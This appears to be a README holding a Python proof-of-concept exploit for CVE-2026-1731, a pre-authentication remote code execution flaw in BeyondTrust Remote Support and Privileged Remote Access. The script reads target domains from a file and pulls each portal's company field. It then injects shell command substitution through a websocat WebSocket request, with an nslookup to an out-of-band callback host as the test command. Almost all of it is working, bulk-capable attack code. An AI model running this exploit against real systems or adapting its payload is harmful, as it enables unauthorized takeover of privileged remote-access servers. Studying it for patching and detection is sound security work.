README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Title: BeyondTrust Remote Support/Privileged Remote Access Pre-auth RCE
CVE: CVE-2026-1731
Script Author: Bipin Jitiya (@win3zz)
Script Tested on: Ubuntu 20.04.6 LTS with Python 3.8.10
Writeup: https://attackerkb.com/topics/jNMBccstay/cve-2026-1731/rapid7-analysis
"""
import asyncio
import subprocess
import requests
import re
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# ==========================
# Command
# ==========================
CMD = "nslookup XXXXXXXXXXXXXXXXXXX.oast.fun"
# ==========================
# Verbose toggle
# ==========================
VERBOSE = False
def vprint(*args, **kwargs):
"""Verbose print helper"""
if VERBOSE:
print(*args, **kwargs)
# ==========================
# Read domains
# ==========================
def read_domains(path):
with open(path, "r") as f:
return [line.strip() for line in f if line.strip()]
# ==========================
# Fetch portal info
# ==========================
def fetch_portal_info(domain):
for proto in ["http", "https"]:
url = f"{proto}://{domain}/get_portal_info"
try:
vprint(f"Checking: {url}")
resp = requests.get(url, timeout=3, verify=False)
if resp.status_code == 200:
return resp.text
except Exception:
continue
return None
# ==========================
# Extract company field
# ==========================
def parse_company(body):
m = re.search(r"company=([^;]+)", body)
return m.group(1).strip() if m else None
# ==========================
# Websocket exploit runner - logic
# ==========================
async def websocket_action(domain, company):
payload = (
f'echo -ne "hax[\\$({CMD})]\\n'
'aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\\n0\\naaaa\\n" | '
f'./websocat -k wss://{domain}:443/nw '
'--protocol "ingredi support desk customer thin" '
f'-H "X-Ns-Company: {company}" '
'--binary --global-timeout-ms 5000 --global-timeout-force-exit -n -'
)
vprint(f"Command for ws action: {payload}")
vprint(f"Running ws action for {domain}")
proc = subprocess.Popen(
["bash", "-c", payload],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
)
out, err = proc.communicate()
print(f"[{domain}] WebSocket output:")
if out.strip():
print(out)
if err.strip():
print("Error:", err)
# ==========================
# Main
# ==========================
async def main():
domains = read_domains("domains.txt")
for domain in domains:
print(f"\n== Checking {domain} ==")
info = fetch_portal_info(domain)
if not info:
print("No portal info, skipping")
continue
vprint(f"Raw response: {info}")
company = parse_company(info)
if not company:
print("Company not found, skipping")
continue
print(f"Company: {company}")
print("Running WebSocket action...")
try:
await websocket_action(domain, company)
except Exception as e:
print(f"Error for {domain}: {e}")
# Run script
asyncio.run(main())